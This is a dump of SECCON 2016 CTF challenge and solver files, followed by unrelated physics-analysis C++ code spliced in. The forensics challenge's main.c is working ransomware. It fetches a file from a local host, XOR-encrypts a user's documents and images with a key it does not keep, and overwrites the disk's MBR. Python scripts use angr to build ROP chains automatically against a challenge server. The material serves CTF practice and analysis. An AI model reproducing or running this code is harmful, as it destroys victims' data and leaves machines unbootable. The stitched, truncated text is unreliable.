printi(MAX, TEXT_COLOR_WHITE);
print(" files", TEXT_COLOR_WHITE);
}
print("\r\nChecking done. Press any key to continue...", TEXT_COLOR_WHITE);
getkey();
int cur = 0;
set_video_mode();
set_bg_color(TEXT_COLOR_BLACK);
while (1) {
print("\rCan you find the flag? :)", cur%0x10);
cur++;
}
stop();
}
<file_sep>/Crypto/300_biscuiti/workspace/encrypt.php
<?php
define("ENC_KEY", "!Wn<KEY>*>U!");
define("ENC_METHOD", "aes-128-cbc");
$password = "<PASSWORD>";
$iv = "Jo\x91Gwe&J\xf2>G#\xdd.X[";
$enc_password = $iv . openssl_encrypt($password, ENC_METHOD, ENC_KEY, true, $iv);
$enc_password = base64_encode($enc_password);
echo $enc_password . "\n";
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/colors.h
#ifndef _COLORS_H_
#define TEXT_COLOR_BLACK 0x00
#define TEXT_COLOR_BLUE 0x01
#define TEXT_COLOR_GREEN 0x02
#define TEXT_COLOR_CYAN 0x03
#define TEXT_COLOR_RED 0x04
#define TEXT_COLOR_MAGENTA 0x05
#define TEXT_COLOR_BROWN 0x06
#define TEXT_COLOR_LIGHT_GRAY 0x07
#define TEXT_COLOR_DARK_GRAY 0x08
#define TEXT_COLOR_LIGHT_BLUE 0x09
#define TEXT_COLOR_LIGHT_GREEN 0x0a
#define TEXT_COLOR_LIGHT_CYAN 0x0b
#define TEXT_COLOR_LIGHT_RED 0x0c
#define TEXT_COLOR_LIGHT_MAGENTA 0x0d
#define TEXT_COLOR_YELLOW 0x0e
#define TEXT_COLOR_WHITE 0x0f
#define _COLORS_H_
#endif
<file_sep>/Binary/400_ropsynth/misc/use_angrop.py
#!/usr/bin/env python
import angr, angrop
from IPython import embed
import sys
"""
p = angr.Project("./a.o",
load_options={
"main_opts": {
"custom_arch" : "AMD64",
"backend" : "blob",
"custom_base_addr" : 0xdeadbeef,
"custom_entry_point": 0xdeadbeef,
},
})
"""
p = angr.Project(sys.argv[1])
print "ROP"
rop = p.analyses.ROP()
print "find_gadgets"
rop.find_gadgets_single_threaded()
embed()
#rop.do_syscall(1,[])
<file_sep>/Binary/400_ropsynth/misc/solve.py
#!/usr/bin/env python
import angr
import claripy
import sys
from IPython import embed
BASEADDR_CODE = 0x04000000
#fname = sys.argv[1]
fname = "gadgets"
load_options={
"main_opts": {
"custom_arch": "AMD64",
"backend": "blob",
"custom_base_addr": BASEADDR_CODE,
"custom_entry_point": 0,
},
}
def get_symbuf(size):
symbuf = []
for cnt in range(size):
symbuf.append(claripy.BVS("BUF_%08x"%cnt, 8, explicit_name=True))
return symbuf
def get_initial_state(prj, symbuf):
#state = prj.factory.entry_state()
state = prj.factory.blank_state()
for cnt, symchar in enumerate(symbuf):
state.memory.store(state.regs.rsp+cnt, symchar, endness='Iend_LE')
return state
def depends_only_on_buf(symvar):
for v in symvar.variables:
if v.startswith("BUF_") == False:
return False
return True
def check_constraints(state):
for constraint in state.se.constraints:
if depends_only_on_buf(constraint) == False:
return False
return True
symbuf = get_symbuf(4096)
prj = angr.Project(fname, load_options=load_options)
initial_state = get_initial_state(prj, symbuf)
candidates = []
for offset in range(prj.loader.main_bin.get_min_addr(),
prj.loader.main_bin.get_max_addr()):
state = initial_state.copy()
pg = prj.factory.path_group(state, save_unconstrained=True)
pg.step(addr=BASEADDR_CODE+offset)
while len(pg.active) > 0:
pg.step()
for upath in pg.unconstrained:
if check_constraints(upath.state):
candidates.append(upath)
embed()
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/util.c
#include "types.h"
#include "colors.h"
__asm__(".code16gcc");
void set_video_mode(void) {
__asm__ __volatile__(
"mov ah, 0x00\n"
"mov al, 0x12\n"
"int 0x10\n"
);
}
void set_bg_color(uint16_t color) {
__asm__ __volatile__(
"mov ah, 0x0b\n"
"int 0x10\n"
: : "b"(color)
);
}
void print(const char *s, uint16_t color) {
for(;*s;s++) {
__asm__ __volatile__("int 0x10" : : "a"(0x0E00|*s), "b"(color&0x00ff));
}
}
void putchar(const char c, uint16_t color) {
__asm__ __volatile__("int 0x10" : : "a"(0x0E00|c), "b"(color&0xff));
}
void printi(int n, uint16_t color) {
if(n) {
printi(n/10, color);
putchar((n%10)+'0', color);
}
}
void movecursor(uint16_t x, uint16_t y) {
__asm__ __volatile__("int 0x10" : : "a"(0x0200), "b"(0x0000), "d"(y<<8|x));
}
int getkey(void) {
int ret;
__asm__ __volatile__("int 0x16" : "=a"(ret) : "a"(0x0000));
}
void reboot(void) {
__asm__ __volatile__(
"mov ah, 0x00\n"
"int 0x16\n"
"int 0x19\n"
);
}
void stop(void) {
while(1) {
__asm__ ("hlt");
}
}
<file_sep>/Binary/200_Retrospective/Solver/Solver/Solver/Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace Solver
{
class Program
{
static limited_char[] cache;
static string solve()
{
RESCAN:
var signature = 0x620F3671;
var str = new limited_char[28];
var sum = (long)long.MaxValue;
var maskswitch = false;
var rnd = new Random();
for (int i = 0; i < str.Length; i++)
str[i] = 0;
for (int i = 0; i < str.Length - 1; i++)
{
str[i] = new limited_char((char)rnd.Next((int)' ', (int)'~'));
}
for (int i = 0; i < cache.Length; i++)
str[i] = cache[i];
if (cache.Length < 16)
{
maskswitch = true;
str[16] = '_';
str[17] = 'P';
str[18] = '_';
}
do
{
var act = rnd.Next(cache.Length, str.Length - 1 - (maskswitch ? 3 : 0));
if (act >= 16) act += (maskswitch ? 3 : 0);
var bck = str[act];
var bck2 = sum;
if (sum < signature)
{
if (act <= str.Select((e, i) => new { Index = i, Element = e }).First(e => e.Element == 0x0).Index)
str[act]++;
}
else if (sum > signature)
{
str[act]--;
if (str[act + 1] != 0 && str[act] == 0x0)
{
str[act]++;
}
}
{
var n = str.Select((e, i) => new { Index = i, Element = e }).First(e => e.Element == 0x0).Index;
str[n] = '}';
sum = str.Select((e, i) => e * (long)Math.Pow(2, i)).Sum();
str[n] = 0;
}
if ((Math.Abs(bck2 - signature) + 0x1000) <= Math.Abs(sum - signature))
{
str[act] = bck;
continue;
}
}
while (sum != signature);
if (str.Skip(14).Take(2).Select((e, i) => (long)e * (long)Math.Pow(4, i)).Sum() == 350 && str[16] == '_' && str[17] == 'P' && str[18] == '_')
{ }
else
{
goto RESCAN;
}
var ret = new string(str.TakeWhile(e => e != 0).Select(e => (char)e).ToArray()).Trim() + "}";
sum = ret.Select((j, i) => j * (long)Math.Pow(2, i)).Sum();
return ret;
}
static void Main(string[] args)
{
cache = "SECCON{LEGACY_".ToCharArray().Select(e => (limited_char)e).ToArray();
var time = DateTime.Now;
Console.WriteLine("BEGIN : " + time);
{
Console.Write("1st prediction...");
var ret = new List<string>();
Parallel.For(0, 20, i =>
{
ret.Add(solve());
});
ret.Sort();
Console.WriteLine("Done : " + (DateTime.Now - time));
var z = ret.Select(e => e.Substring(0, 19)).GroupBy(e => e).ToDictionary(e => e.Key, e => e.Count()).OrderByDescending(e => e.Value);
foreach(var e in z)
{
Console.WriteLine(e.Key + " --- " + e.Value);
}
Console.WriteLine("Choose : " + z.First().Key);
cache = z.First().Key.Select(e => (limited_char)e).ToArray();
}
{
string ret = "";
Console.WriteLine();
Console.Write("2nd prediction...");
while (true)
{
ret = solve();
var hash = BitConverter.ToString(SHA1Managed.Create().ComputeHash(Encoding.ASCII.GetBytes(ret))).Replace("-", "");
if (hash == "8B292F1A9C4631B3E13CD49C64EF74540352D0C0")
break;
}
Console.WriteLine("SOLVED : " + (DateTime.Now - time));
Console.WriteLine();
Console.WriteLine("RET : " + ret);
}
Console.WriteLine();
}
}
}
<file_sep>/Forensic/300_randomware/build/ransom/main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/reboot.h>
#define KEY_SIZE 1024
extern char _binary_mbrapp_mbr_start[];
extern char _binary_mbrapp_mbr_end[];
extern char _binary_mbrapp_mbr_size[];
dev_t root_dev;
const char *mbr_start, *mbr_end;
char encrypt_key[KEY_SIZE];
int mbr_size;
static char target_ext[][10] = {
".txt", ".bin",
// picture
".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tif", ".tiff",
// documents
".doc", ".docx", ".docm",
".xls", ".xlsx", ".xlsm",
".ppt", ".pptx", ".pptm",
".odt", ".pdf", ".xml",
};
void encrypt(char *path) {
FILE *fp;
int i;
char *buf;
int size;
if((fp = fopen(path, "r+")) == NULL) {
perror("fopen");
return;
}
fseek(fp, 0, SEEK_END);
size = ftell(fp);
buf = (char*)malloc(size*sizeof(char));
fseek(fp, 0, SEEK_SET);
fread(buf, 1, size, fp);
for(i = 0; i < size; i++) {
buf[i] = buf[i]^encrypt_key[i%KEY_SIZE];
}
fseek(fp, 0, SEEK_SET);
fwrite(buf, 1, size, fp);
free(buf);
fclose(fp);
}
void get_root_dev(void) {
struct stat st;
if(stat("/home", &st)) {
perror("stat");
return;
}
root_dev = st.st_dev;
}
void get_key() {
FILE *fp;
if((fp = fopen("/dev/urandom", "r")) == NULL) {
perror("fopen");
}
if(fread(encrypt_key, 1, KEY_SIZE, fp) < KEY_SIZE) {
perror("fread");
}
fclose(fp);
}
void recdir(char *path) {
DIR *dp;
struct dirent *dent;
struct stat st;
char *tmp;
int len1, len2, addslash;
int i;
if((dp = opendir(path)) == NULL) {
perror("opendir");
return;
}
while((dent = readdir(dp)) != NULL) {
if(!strcmp(dent->d_name, ".")) {
continue;
}
if(!strcmp(dent->d_name, "..")) {
continue;
}
len1 = strlen(path);
len2 = strlen(dent->d_name);
addslash = (path[len1-1] != '/')?1:0;
tmp = (char*)malloc(len1+len2+2);
strcpy(tmp, path);
if(addslash) strcat(tmp, "/");
strcpy(tmp+len1+addslash, dent->d_name);
if(stat(tmp, &st)) {
perror("stat");
free(tmp);
continue;
}
if(st.st_dev != root_dev // file on virtual file system
|| st.st_mode & S_IFMT == S_IFBLK
|| st.st_mode & S_IFMT == S_IFCHR
|| st.st_mode & S_IFMT == S_IFIFO
|| st.st_mode & S_IFMT == S_IFLNK
|| st.st_mode & S_IFMT == S_IFREG
|| st.st_mode & S_IFMT == S_IFSOCK ) { // ignore files
continue;
}
if ((st.st_mode & S_IFMT) == S_IFDIR) { // directory
recdir(tmp);
}
else { // file
for(i = 0; i < sizeof(target_ext)/sizeof(char*); i++) {
if(strstr(tmp, target_ext[i])-tmp == strlen(tmp)-strlen(target_ext[i])) {
encrypt(tmp);
}
}
}
free(tmp);
}
closedir(dp);
}
int main(int argc, char **argv) {
char tmp[0x100];
FILE *fp;
if(getuid() != 0) {
fprintf(stderr, "Please run as root.\n");
exit(-1);
}
// remove(argv[0]);
system("wget http://172.17.0.1/h1dd3n_s3cr3t_f14g.jpg");
get_root_dev();
get_key();
recdir("/home/tc");
mbr_start = _binary_mbrapp_mbr_start;
mbr_end = _binary_mbrapp_mbr_end;
mbr_size = (int)_binary_mbrapp_mbr_size;
// overwrite mbr
// sprintf(tmp, "/sys/dev/block/%d:%d", major(root_dev), minor(root_dev));
if((fp = fopen("/dev/sda", "r+"))== NULL) {
perror("fopen");
return;
}
fwrite(mbr_start, 1, mbr_size, fp);
fclose(fp);
// system("reboot");
// reboot(LINUX_REBOOT_CMD_RESTART);
return 0;
}
<file_sep>/Binary/400_ropsynth/solver/solve.py
#!/usr/bin/env python
import angr
import claripy
import sys
from IPython import embed
from simuvex import s_options
import logging
import pwn
import binascii
l = logging.getLogger("ropsynth")
l.setLevel(logging.INFO)
logging.getLogger("simuvex").setLevel(logging.CRITICAL)
BASEADDR_CODE = 0x00800000
BASEADDR_DATA = 0x00a00000
def get_symbuf(size):
symbuf = []
for cnt in range(size):
symbuf.append(claripy.BVS("BUF_%08x"%cnt, 8, explicit_name=True))
return symbuf
def get_initial_state(prj, symbuf):
#state = prj.factory.entry_state()
state = prj.factory.blank_state()
for cnt, symchar in enumerate(symbuf):
state.memory.store(state.regs.rsp+cnt, symchar, endness='Iend_LE')
state.memory.store(BASEADDR_DATA, claripy.BVV("flag\0"))
"""
state.regs.rax = claripy.BVV(0, 64)
state.regs.rbp = claripy.BVV(0, 64)
state.regs.rbx = claripy.BVV(0, 64)
state.regs.rcx = claripy.BVV(0, 64)
state.regs.rdi = claripy.BVV(0, 64)
state.regs.rdx = claripy.BVV(0, 64)
state.regs.rax = claripy.BVV(0, 64)
state.regs.rsi = claripy.BVV(0, 64)
state.regs.r8 = claripy.BVV(0, 64)
state.regs.r9 = claripy.BVV(0, 64)
state.regs.r10 = claripy.BVV(0, 64)
state.regs.r11 = claripy.BVV(0, 64)
state.regs.r12 = claripy.BVV(0, 64)
state.regs.r13 = claripy.BVV(0, 64)
state.regs.r14 = claripy.BVV(0, 64)
state.regs.r15 = claripy.BVV(0, 64)
"""
return state
def depends_only_on_buf(symvar, offset_limit):
for v in symvar.variables:
if v.startswith("BUF_") == False:
return False
"""
if int(v[4:], 16) >= offset_limit:
return False
"""
return True
def check_constraints(state):
global orig_rsp
offset_limit = state.se.any_int(state.regs.rsp - orig_rsp)
for constraint in state.se.constraints:
if depends_only_on_buf(constraint, offset_limit) == False:
return False
return True
def check_memory_access(path):
global orig_rsp
for action in path.actions:
if action.type == 'mem':
if action.addr.ast.symbolic:
"""
if depends_only_on_buf(action.addr.ast, None):
continue
"""
return False
else:
# TODO: check address
addr = path.state.se.any_int(action.addr)
if addr < orig_rsp or addr >= orig_rsp+4096:
l.info("addr:%x orig_rsp: %x" % (addr, orig_rsp))
return False
return True
set_rax2rdi = "\x50\x5f"
pop_rdi = "\x5f"
pop_rax = "\x58"
syscall = "\x0f\x05"
pop_rbx = "\x5b"
pop_rsi = "\x5e"
set_rax2rdx = "\x50\x5a"
pop_rdx = "\x5a"
def findall(prj, target):
image = "".join(prj.loader.main_bin.memory.read_bytes(0, 4096))
offset_list = []
offset = image.find(target)
while offset >= 0:
offset_list.append(offset)
offset = image.find(target, offset+1)
return offset_list
debug = 0
def find_gadget(prj, initial_state, insn_ptn, get_constraints,
first_gadget=False, last_gadget=False):
final_states = []
candidates = []
for offset in findall(prj, insn_ptn):
#l.info("pattern found: %x" % offset)
state = initial_state.copy()
if first_gadget:
state.add_constraints(
state.memory.load(state.regs.rsp, endness='Iend_LE') == (BASEADDR_CODE+offset))
state.regs.rsp += 8
else:
#print "rip:", state.regs.rip,
#print "value:", BASEADDR_CODE+offset
state.add_constraints(state.regs.rip == (BASEADDR_CODE+offset))
pg = prj.factory.path_group(state, save_unconstrained=True)
if insn_ptn == syscall:
# dirty hack for syscall
pg.step(addr=BASEADDR_CODE+offset+2)
else:
pg.step(addr=BASEADDR_CODE+offset)
loopcnt=0
while len(pg.active) > 0:
pg.step()
loopcnt += 1
if loopcnt > 100:
#raise Exception("loop limit")
l.warn("loop limit")
break
if len(pg.unconstrained) == 0 and last_gadget == False:
continue
for upath in pg.unconstrained:
if check_constraints(upath.state):
candidates.append((upath, offset))
if last_gadget:
for dpath in pg.deadended:
if check_constraints(dpath.state):
candidates.append((dpath, offset))
for cand_path, cand_offset in candidates:
rsp_delta = cand_path.state.se.any_int(cand_path.state.regs.rsp - initial_state.regs.rsp)
if rsp_delta < 8 or rsp_delta > 256:
l.info("rsp_delta limit")
continue
else:
l.info("rsp_delta: %d" % rsp_delta)
constraints = get_constraints(cand_path.state)
if constraints != None:
cand_path.state.add_constraints(constraints)
if cand_path.state.satisfiable():
if check_memory_access(cand_path):
l.info("candidate offset: %x" % cand_offset)
final_states.append(cand_path.state)
l.info("len(final_states): %d" % len(final_states))
if len(final_states) == 0:
return None
if len(final_states) > 1:
l.info("multiple candidates exist")
return final_states[0]
#return final_states[-1]
orig_rsp = 0
def construct_ropchain(fname):
global orig_rsp
load_options={
"main_opts": {
"custom_arch": "AMD64",
"backend": "blob",
"custom_base_addr": BASEADDR_CODE,
"custom_entry_point": 0,
},
}
l.info("started")
prj = angr.Project(
fname, load_options=load_options, simos=angr.simos.SimLinux)
# angr's bug? A blob project needs is_ppc64_abiv1.
prj.loader.main_bin.is_ppc64_abiv1 = False
symbuf = get_symbuf(4096)
initial_state = get_initial_state(prj, symbuf)
initial_state.options.add(s_options.BYPASS_UNSUPPORTED_SYSCALL)
initial_state.options.add(s_options.NO_SYMBOLIC_SYSCALL_RESOLUTION)
initial_state.options.add(s_options.AVOID_MULTIVALUED_READS)
initial_state.options.add(s_options.AVOID_MULTIVALUED_WRITES)
initial_state.options.add(s_options.TRACK_ACTION_HISTORY)
state = initial_state
orig_rsp = state.se.any_int(initial_state.regs.rsp)
state = find_gadget(
prj, state, pop_rdi, lambda s: s.regs.rdi == BASEADDR_DATA, True)
state = find_gadget(prj, state, pop_rsi, lambda s: s.regs.rsi == 0)
state = find_gadget(prj, state, pop_rdx, lambda s: s.regs.rdx == 0)
state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 2)
state = find_gadget(prj, state, syscall, lambda s: None)
state = find_gadget(
prj, state, set_rax2rdi, lambda s: state.regs.rax == s.regs.rdi)
state = find_gadget(
prj, state, pop_rsi, lambda s: s.regs.rsi == BASEADDR_DATA)
state = find_gadget(prj, state, pop_rdx, lambda s: s.regs.rdx == 255)
state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 0)
state = find_gadget(prj, state, syscall, lambda s: None)
state = find_gadget(prj, state, pop_rdi, lambda s: s.regs.rdi == 1)
state = find_gadget(
prj, state, pop_rsi, lambda s: s.regs.rsi == BASEADDR_DATA)
state = find_gadget(
prj, state, set_rax2rdx, lambda s: state.regs.rax == s.regs.rdx)
state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 1)
state = find_gadget(prj, state, syscall, lambda s: None)
state = find_gadget(prj, state, pop_rdi, lambda s: s.regs.rdi == 0)
state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 231)
state = find_gadget(prj, state, syscall, lambda s: None, last_gadget=True)
buf = ""
for cnt in range(state.se.any_int(state.regs.rsp-orig_rsp)):
buf += state.se.any_str(symbuf[cnt])
l.info("finished")
return buf
def main():
sock = pwn.mktcp((sys.argv[1], int(sys.argv[2])))
cnt = 0
while True:
gadgets_fname = "gadgets.%d" % cnt
ropchain_fname = "ropchain.%d" % cnt
banner = sock.recv_until("\n").strip()
if banner.startswith("SECCON{"):
break
print banner
encoded_gadgets = sock.recv_until("\n")
gadgets = binascii.a2b_base64(encoded_gadgets)
gadgets += '\xCC' * (4096-len(gadgets))
open(gadgets_fname, "wb").write(gadgets)
ropchain = construct_ropchain(gadgets_fname)
ropchain += '\xFF' * (4096-len(ropchain))
open(ropchain_fname, "wb").write(ropchain)
sock.send(binascii.b2a_base64(ropchain))
result = sock.recv_until("\n").strip()
if result != "OK":
print result
break
print result
cnt += 1
print banner
if __name__ == '__main__':
main()
<file_sep>/Binary/200_Retrospective/Solver/Solver/Solver/limited_char.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Solver
{
class limited_char
{
private char _current;
public limited_char(char i)
{
_current = i;
}
public static implicit operator char(limited_char c)
{
if (c == null)
return (char)0;
else
return c._current;
}
public static implicit operator int(limited_char c)
{
if (c == null)
return 0;
else
return c._current;
}
public static implicit operator limited_char(char c)
{
return new limited_char(c);
}
public static implicit operator limited_char(int c)
{
return new limited_char((char)c);
}
public override string ToString()
{
return this._current.ToString();
}
public static limited_char operator ++(limited_char c)
{
var rc = c._current + 1;
if (rc > 0x5a)
rc = 0x5f;
if (rc > 0 && rc < 0x41)
rc = 0x41;
return new limited_char((char)rc);
}
public static limited_char operator --(limited_char c)
{
var rc = c._current - 1;
if (rc > 0x5a)
rc = 0x5a;
if (rc < 0x41)
rc = 0x0;
return new limited_char((char)rc);
}
}
}
<file_sep>/README.md
# SECCON2016_online_CTF
We will update some challenges.
##Top 20 Ranking(12/11/2016 15:00 JST)
|Rank|Point|Team|
|---|---|---|
|1|6500|PPP|
|2|6400|217|
|3|5700|binja|
|4|5400|HITCON|
|5|5200|Cykor|
|6|5100|Dragon_Sector|
|7|4600|!SpamAndHex|
|8|4400|Bushwhackers|
|9|4100|Tasteless|
|10|4000|AAA|
|11|3900|KAIST GoN|
|12|3800|CS16|
|13|3500|0ops|
|14|3500|shellphish|
|15|3300|eee|
|16|3300|PwnPineappleApplePwn|
|17|3100|GYG|
|18|3100|0daysober|
|19|3100|CLGT|
|20|3000|ACM-ICPHP|
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/types.h
#ifndef _TYPES_H_
#define _TYPES_H_
typedef unsigned char uint8_t;
typedef unsigned short uint16_t;
typedef unsigned int uint32_t;
typedef unsigned long int uint64_t;
#endif // _TYPES_H_
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/Makefile
CC = gcc
LD = ld
AS = as
CFLAGS = -m32 -ffreestanding -fno-common -fno-builtin -fomit-frame-pointer -masm=intel -O2
ASFLAGS = --32 -fno-common -fno-builtin -fomit-frame-pointer
LDFLAGS = -m elf_i386 -s -static -nostdlib -nmagic --oformat binary
.PHONY: all
all: link write
link: boot main
$(LD) $(LDFLAGS) -Tlinker.ld -o mbr
boot: boot.S
$(AS) $(ASFLAGS) -c -o boot.o boot.S
main: main.c
$(CC) $(CFLAGS) -c -o main.o main.c
write:
# sudo ./writedisk.sh
clean:
rm -f bin *.o
| 4e2ea079b453457cb9b5dae88389b9da127f0540 | [
"Markdown",
"Makefile",
"C#",
"Python",
"PHP",
"C",
"Shell"
] | 21 | Shell | PinkDiamond1/SECCON2016_online_CTF | 5af1c81c9b20387b00ddb4fab4d116dbbd61d3a9 | 5788ff7e23475ccea5d2780bef3b420e819ee437 |
refs/heads/main | <repo_name>Bishnu04/E12-17-003-Matrices<file_sep>/SEPT20_TESTCODE.cc
// SEPT 20, 2021
// Author <NAME>
// Al data involved in tune
// On september 20, Aerogel cuts are loosen
extern double calcf2t_th(double* P,
double xf, double xpf,
double yf, double ypf,double);
extern double calcf2t_ph(double* P,
double xf, double xpf,
double yf, double ypf,double);
extern double calcf2t_mom(double* P,
double xf, double xpf,
double yf, double ypf,double);
const double XFPm=-0.7, XpFPm=-0.15; // m is the mean from the old definition
const double YFPm=-0.05, YpFPm=-0.18;
const double Xptm=-0.07, Yptm=-0.2, Momm=1.74; // tm = target offset.. MOmm is the momentum offset
const double XFPr=1.3, XpFPr=0.27; // r is the scaling factor or range
const double YFPr=0.1, YpFPr=0.10;
const double Xptr=0.15, Yptr=0.08, Momr=0.18; // tr is the target range
const double PLm = 25.4, PLr=0.7; // m is the offset and PLr is the path laegth range
const double Ztm = -0.15,Ztr=0.35; //Ztm z position at target point offset
extern void fcn(int &nPar, double* /*grad*/,
double &fval, double* param, int /*iflag*/);
extern double tune(double* pa, int j);
const int nmax = 3000; // was 3000 before Dec5
double x[nmax], y[nmax];
double xp[nmax], yp[nmax];
double z_recon[nmax];
int foil_flag[nmax];
int ntune_event = 0;
const int npeak = 2;
double Lambda_width[npeak] = {2.37, 2.3}; // +/- from mean position
double Lambda_cent[npeak] ={1115.75,1192.6}; // current peak location
double Lambda_real[npeak] ={1115.683,1192.642}; // Mev// nominal
double p10[nmax],p11[nmax],p12[nmax];
double p13[nmax],p14[nmax],p15[nmax];
double p16[nmax],p17[nmax],p18[nmax],p19[nmax];
double phir[nmax];
double phil[nmax];
// (((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((((((((((((((((((((
const int nmax_2 = 3000; // 2400 before Dec 5
double x_2[nmax_2], y_2[nmax_2];
double xp_2[nmax_2], yp_2[nmax_2];
double z_recon_2[nmax_2];
int foil_flag_2[nmax_2];
const int npeak_2 = 1;
double Lambda_width_2[npeak_2] = {2.38}; //6.5,8.8}
double Lambda_cent_2[npeak_2] ={1115.71};
double Lambda_real_2[npeak_2] ={1115.683}; // Mev
double p10_2[nmax_2],p11_2[nmax_2],p12_2[nmax_2];
double p13_2[nmax_2],p14_2[nmax_2],p15_2[nmax_2];
double p16_2[nmax_2];
double phir_2[nmax_2];
double phil_2[nmax_2];
int ntune_event_2 = 0;
//===============================================Jan 07 2020==========================================
const int nmax_4 = 3000;
double x_4[nmax_4], y_4[nmax_4];
double xp_4[nmax_4], yp_4[nmax_4];
double z_recon_4[nmax_4];
int foil_flag_4[nmax_4];
const int npeak_4 = 3; // JAn 07
double Lambda_width_4[npeak_4] ={1.63,2.38,2.7};// +/- from mean position
double Lambda_cent_4[npeak_4] ={-13.24,-2.125,6.49};//current peak location
double Lambda_real_4[npeak_4] ={-13.24,-2.125,6.49};// nominal position
double p10_4[nmax_4],p11_4[nmax_4],p12_4[nmax_4];
double p13_4[nmax_4],p14_4[nmax_4],p15_4[nmax_4];
double p16_4[nmax_4];
double phir_4[nmax_4];
double phil_4[nmax_4];
int ntune_event_4 = 0;
//)))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t3 ((((((((((((((((((((((((((((((((((((((((((((((((((( // Jan_02
const int nmax_3 =3000;
double x_3[nmax_3], y_3[nmax_3];
double xp_3[nmax_3], yp_3[nmax_3];
double z_recon_3[nmax_3];
int foil_flag_3[nmax_3];
const int npeak_3 = 3;
double Lambda_width_3[npeak_3] ={1.63,2.38,2.7};// +/- from mean position
double Lambda_cent_3[npeak_3] ={-13.24,-2.125,6.49};//current peak location
double Lambda_real_3[npeak_3] ={-13.24,-2.125,6.49};// nominal position
double p10_3[nmax_3],p11_3[nmax_3],p12_3[nmax_3];
double p13_3[nmax_3],p14_3[nmax_3],p15_3[nmax_3];
double p16_3[nmax_3];
double phir_3[nmax_3];
double phil_3[nmax_3];
int ntune_event_3 = 0;
const double m_Al =25.1267; // Al target mass // BY Dr. Tang on Dec 19 2019
const double m_T = 2.808921; // for tritium target by Gogami Tritium target mass
//)))))))))))))))))))))))))))))))) t3 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
//========================================
const int Total_Par = 126;
double thetaL_opt[nmax];
double phiL_opt[nmax];
double thetaR_opt[nmax];
double phiR_opt[nmax];
double momL_opt[nmax];
double momR_opt[nmax];
const int Mom_Par = 252;
//++++++++++++++++++++++++++++++++++++++++++
const double hrs_ang = 13.2 * 3.14159/180.;
const double me = 0.000511;
const double mk = 0.493677;
const double mp = 0.938272;
const double mL = 1.115683;
extern double CalcMM(double ee, double* pvec_ep, double* pvec_k, double mt);
void SEPT20_TESTCODE(){
// ========================================
// ======= Opening a ROOT file ============
// ========================================
TChain * t1 = new TChain("T");
TChain * t2 = new TChain("T");
TChain * t3 = new TChain("T");
t1->Add("./Rootfiles/DEC17_Rootfiles/DEC17_H149_542.root");// replayed on Dec 17, 2019 replay by ole
t2->Add("./Rootfiles/DEC17_Rootfiles/DEC17_HT_552_716.root");
t3->Add("./Rootfiles/DEC17_Rootfiles/DEC23_T221_830.root");
double ent = t1->GetEntries();
double ent_2 = t2->GetEntries();
double ent_3 = t3->GetEntries();
// ent = 50;
// ent_2= 50;
// ent_3 =50;
cout<<"entry in the t1=="<<ent<<endl;
cout<<"entry in the t2=="<<ent_2<<endl;
cout<<"entry in the t3=="<<ent_3<<endl;
const int max = 100;
Double_t trig5[max];
double momL[max];
double momR[max];
double lvz[max],rvz[max];// raster corrected
double th1[max], ph1[max];// RHRS angle
double th2[max], ph2[max];
double delta_pep[max]; // target straggling
double pep_real[max];
double delta_pk[max];
double pk_real[max];
double par_ep[3];
double par_k[3];
double mm;
double hallap;
double mmT_T; //sept4, 2020.. H/T considering as Tritium target
double l_th_fp[max];
double l_ph_fp[max];
double l_x_fp[max];
double l_y_fp[max];
double r_th_fp[max];
double r_ph_fp[max];
double r_x_fp[max];
double r_y_fp[max];
const int n = 16;
double ctime;
double z_av[nmax];
double z_av_1[nmax];
double a1, a2;
// (((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((((((((((((((((((((
Double_t trig5_2[max]; // JUly 01, 2019
double momL_2[max];
double momR_2[max];
double lvz_2[max],rvz_2[max];// raster corrected
double th1_2[max], ph1_2[max];// RHRS angle
double th2_2[max], ph2_2[max];
double delta_pep_2[max]; // target straggling
double pep_real_2[max];
double delta_pk_2[max];
double pk_real_2[max];
double par_ep_2[3];
double par_k_2[3];
double mm_2;
double mm_4;
double mm_ht;
double hallap_2;
double par_ht_ep_2[3];
double par_ht_k_2[3];
double pep_ht_real_2[max];
double pk_ht_real_2[max];
double delta_ht_pep_2[max];
double delta_ht_pk_2[max];
double hallap_ht_2;
double z_av_ht_2[nmax];
double l_th_fp_2[max];
double l_ph_fp_2[max];
double l_x_fp_2[max];
double l_y_fp_2[max];
double r_th_fp_2[max];
double r_ph_fp_2[max];
double r_x_fp_2[max];
double r_y_fp_2[max];
double ctime_2;
double z_av_2[nmax];
double z_av_1_2[nmax];
double a1_2, a2_2;
//)))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((( t3 variables starts here ((((((((((((((((((((((((((((((((((((((((((((((((((( Jan_02
Double_t trig5_3[max]; // JUly 01, 2019
double momL_3[max];
double momR_3[max];
double lvz_3[max],rvz_3[max];// raster corrected
double th1_3[max], ph1_3[max];// RHRS angle
double th2_3[max], ph2_3[max];
double delta_pep_3[max]; // target straggling
double pep_real_3[max];
double delta_pk_3[max];
double pk_real_3[max];
double par_ep_3[3];
double par_k_3[3];
double par_tt_ep_3[3];//// May 01, 2021 , tt means T/T
double par_tt_k_3[3];//// May 01, 2021 , tt means T/T
double hallap_tt_3;//// May 01, 2021 , tt means T/T
double z_av_tt_3[nmax];//// May 01, 2021 , tt means T/T
double delta_tt_pep_3[max];//// May 01, 2021 , tt means T/T
